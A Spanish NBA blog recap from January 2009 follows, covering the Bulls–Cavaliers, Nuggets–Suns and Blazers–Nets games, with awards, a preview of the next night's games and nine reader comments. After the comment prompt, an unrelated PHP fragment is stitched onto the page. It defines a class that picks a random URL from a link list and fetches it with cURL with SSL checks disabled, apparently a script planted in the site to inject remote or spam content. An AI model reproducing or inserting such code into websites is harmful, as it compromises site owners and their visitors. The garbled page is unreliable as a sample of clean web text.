La crónica (15/1/2009)

16 de January de 2009 por MagicJohnson32

Los jueves… qué poco nos gustan los jueves. Ya lo cantaban los Boomtown Rats (vale, ellos decían los lunes, pero supongo que no eran aficionados a la NBA). La cuestión es que, como jueves que era ayer, la madrugada dejó sólo tres partidos. Aunque hubo cosas interesantes. Por ejemplo, los Lakers vuelven a liderar la NBA, y eso que no jugaron. Pueden agradecérselo a los Bulls, que derrotaron a los Cavaliers tras una prórroga en un día bastante gris por parte de LeBron James, quien pese a lograr 28 puntos, 14 rebotes y 7 asistencias falló 20 de sus 28 tiros de campo y perdió 8 balones. Malas noticias además para los Cavs: Delonte West se lesionó la muñeca y se perderá unas cuantas semanas (¡¡llamando a Daniel Gibson!!).

En los Bulls vimos el mejor partido de Deng en mucho tiempo, cosa  que no era difícil. Además, Hinrich parece haber vuelto en bastante mejor forma de la que presentaba antes de su lesión, que tampoco es decir mucho. Tyrus Thomas tuvo un buen día (lo que nos lleva a pensar que jugará mal el próximo partido) y Derrick Rose arregló a última hora una actuación que durante los tres primeros cuartos estaba siendo horrible. ¿Hemos dicho que los Cavs jugaban sin Ben Wallace ni Ilgauskas? Es decir, con Lorenzen Wright de titular. ¿A que ya no le veis tanto mérito al triunfo de los Bulls?

Otro partido decidido en la prórroga fue el Suns @ Nuggets, también en favor del equipo local. Por algún motivo que no alcanzamos a comprender, Porter decidió dar descanso a Shaquille O’Neal para este encuentro y reservarlo para el que jugarán hoy mismo en casa contra Minnesota. Consecuencia de ello: el juego interior de los Nuggets se salió. Entre Kenyon y Nene sumaron 41 puntos, 22 rebotes y 9 recuperaciones. Aunque no sé qué resulta más sorprendente, si los 7 robos de Kenyon Martin o las 7 asistencias de JR Smith…

Antes de eso, los Blazers remontaron a los Nets de la mano de Roy, Aldridge, Outlaw y Bayless. Entre los cuatro anotaron los últimas 34 puntos de su equipo. Y ninguno de los cuatro tiene más de 24 años. Qué bonito es el proyecto de los Blazers, pese al caso Miles. Resulta obvio que el primer punto del partido que Sergio y Bayless disputarán mientras Steve Blake permanezca de baja cayó del lado del rookie. ¿Mantendrá a McMillan al canario como titular? Otra cosa que quedó de manifiesto anoche: Brook Lopez es, hasta la fecha, mucho más jugador que Greg Oden.

PREMIOS

MVP: Sin las actuaciones descomunales de otras jornadas, la de anoche nos dejó como principales candidatos al MVP a Brandon Roy (29 puntos, 8 rebotes, 5 asistencias, 2 robos) en la victoria de los Blazers en New Jersey, Luol Deng (22 puntos, 8 rebotes, 4 robos, 3 asistencias) en el triunfo de los Bulls sobre los Cavs y a Kenyon Martin (24 puntos, 8 rebotes y 7 recuperaciones) para los Nuggets, vencedores de su duelo contra los Suns.

El rookie: Hace un par de días nos decepcionó con su 1 de 11 en tiros de campo. Anoche, en cambio, Jerryd Bayless nos dejó boquiabiertos con un mate brutal que sirvió para culminar una gran actuación. 23 puntos, con 6 de 9 en tiros de campo y 11 de 11 en libres, además de 3 rebotes y 3 asistencias, consiguió el base novato de los Blazers.

La sorpresa: Tras hacer 0 de 6 y 1 de 6 en sus últimos dos partidos, Linas Kleiza anotó 8 de sus 11 tiros de campo ante los Suns. Lamentablemente, no viene siendo muy habitual que el lituano anote con tanto acierto.

La decepción: Así es Leandro Barbosa. Un partido anota 22 puntos en 23 minutos, y al siguiente falla 10 de sus 11 lanzamientos.

El mayor esfuerzo en vano: No es casualidad. Cuando no está Shaq, la cifra de asistencias de Steve Nash se dispara. Ayer se fue hasta las 14, que acompañó con 20 puntos (4 de 5 en triples) y 7 rebotes.

RAZONES PARA TRASNOCHAR

Una jornada con 10 partidos ofrece siempre muchos atractivos. La de esta noche es como para empezar a ver NBA a la 1:00 con el Spurs @ Sixers, engancharse a las 2:00 al Hornets @ Cavaliers, y culminarlo a lo grande a las 4:30 con un Magic @ Lakers que enfrenta a los dos equipos con más victorias de la liga, ambos con 31. Los angelinos llegan tras una cruel derrota en San Antonio; los de Florida, por su parte, vienen de establecer el récord histórico de triples en un partido (23). El espectáculo está garantizado.

El jugador al que conviene seguir de cerca es… Dwight Howard. Y, por consiguiente, a Andrew Bynum. La mayor fuerza interior de la actualidad visita a uno de los principales pívots jóvenes de la liga. Lewis, Turkoglu, Nelson y Redick freirán a los Lakers a triples; Kobe Bryant y Pau Gasol volverán a comandar la nave amarilla; pero mientras todo eso ocurre, bajo los aros se producirá una batalla que puede decidir el partido.

Comenta

9 comentarios a esta entrada

  1. couxe dice:
    #1

    Bueno, creo que hoy toca trasnochar un poco… Hornets contra Cavs y a continuación los Lakers que reciben a Orlando… buenas razones para mantenerse despierto…
    Por cierto, partidazo en directo en cuatro… los Jazz visitan a los potentísimos Grizzlies… Anda que no habrá partidos…

      Citar

  2. MagicJohnson32 dice:
    #2

    Cierto, cierto. Ayer entré en la web de Cuatro para ver si hacían el Hornets-Cavs o el Magic-Lakers. Cuando vi que hacían el Jazz-Grizzlies… Bueno, en realidad no los veo por Cuatro nunca, así que lo mismo me da.

      Citar

  3. Txusma dice:
    #3

    Pues a mi me motiva mas el Magic-Lakers sobretodo por lo que comenta Magic en la cronica de la lucha bajo los aros pero también para comprobar si Orlando vuelve a demostrar que este año son candidatos serios al anillo. Y una duda: Gasol a quien defendera? Es posible que entre Odom en el quinteto y salgan Bynum o Gasol?

      Citar

  4. MagicJohnson32 dice:
    #4

    No lo creo. Todos los problemas defensivos que puedan tener los Lakers por poner a Pau sobre Lewis los tendrán (y posiblemente mayores) los Magic al no tener a nadie con quien frenar a Gasol.

      Citar

  5. RusticoColorao dice:
    #5

    Dos victorias seguidas…uauuu
    Rose venía de salirse literalmente en el último cuarto de la victoria ante los raptors señor Magic…tiene carencias, sobre todo en el tiro, pero me parece que puede ser uno de los mejores bases de la liga. Y hombre, yo no esperaba ganar a Lebron, aunque viendo el juego interior me lo explico un poco más.

      Citar

  6. toni dice:
    #6

    Podriais decirme donde ver los partidos de nba??
    Aparte de en cuatroº o en rojadirecta qe se va parando..
    esqe seria bueno empalmar el cavs-hornets con el lakers-magic.
    Gracias.

      Citar

  7. Txusma dice:
    #7

    Es que vaya lucha bajo los tableros que hubo en el Cavs – Bulls: Wright – Varejao vs Thomas – Noah…
    Pq no saldria Gooden de titular?

      Citar

  8. kantonyo dice:
    #8

    Voy a comparar las estadisticas de Bayless con los dos españoles de Portland, todo en medias de 36 minutos en cancha:

    DEFENSIVO:

    PG – BAYLESS – 3.1 rebdf – 1.3 rob – 3.7 per – 4.1 fp – (0.3 rob/fp)
    PG – RODRIGUEZ – 2.1 rebdf – 1.8 rob – 3.3 per – 3.6 fp – (0.5 rob/fp)
    SG – FERNANDEZ – 3.0 rebdf – 1.1 rob – 1.8 per – 1.8 fp – (0.6 rob/fp)

    Las estadísticas más o menos dicen, que la intensidad defensiva de rudy es menor pero más efectiva, y que al contrario Jerryd provoca más faltas pero no por ello consigue robar más balones. Sergio parece estar menos concentrado en el rebote defensivo y por lo tanto necesita estar más involucrado en las jugadas defensivas después de tiro, aunque consigue robar más balones.

    OFENSIVO:

    PG – BAYLESS – 14.1 pp – 0.6 rebof – 3.9 as – 3.7/12.2 tc (30%) – 10% 3p – 6.3/7.4 tl (85%) – 9.6 eff
    PG – RODRIGUEZ – 9.6 pp – 1.3 rebof – 8.1 as – 3.3/9.4 tc (35%) – 28% 3p – 1.9/2.3 (83%) – 13.1 eff
    SG – FERNANDEZ – 14.8 pp – 1.3 rebof – 2.9 as – 4.8/11.3 tc (42%) – 39% 3p – 2.7/3.0 (88%) – 14.8 eff

    Ofensivamente queda claro que los números de Bayless son bastantes malos, y solo los maquilla con sus entradas a canastas, que más que conseguir encestar, lo que provoca son bastantes faltas a su favor, y son esos 6.3 ptos de tiro libre en 36 minutos lo único positivo. Tambien es el más decidido a tirar a canasta a pesar de ser el que menos acierto tiene.

    En resumen lo que quiero decir es que a pesar de que todos pensabamos que la falta de minutos y protagonismo de Rudy o Sergio era por su poca experiencia o en el caso de Sergio su capacidad defensiva, con Jerryd le está premiando cada vez con más minutos a pesar de hacerlo muchisimo peor que los españoles.

    Aunque a lo mejor la culpa es de Sergio y Rudy de no intententar tener más protagonismo y dejar de tener miedo de su entrenador.

      Citar

  9. Jabho dice:
    #9

    bueno, si McMillan le hubiera dado en su año de rookie a Sergio el trato que le está dando a Bayless lo que se hubiera dicho de él… Mira que a mi McMillan me parece cerrado en algunos temas, pero de verdad que Sergio no veo que se gane mucho mas de lo que tiene.

    Yo creo que Rudy está teniendo una muy buena actitud y juego en su primer año. Tiene que evitar que le encasillen como triplista pero está jugando bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>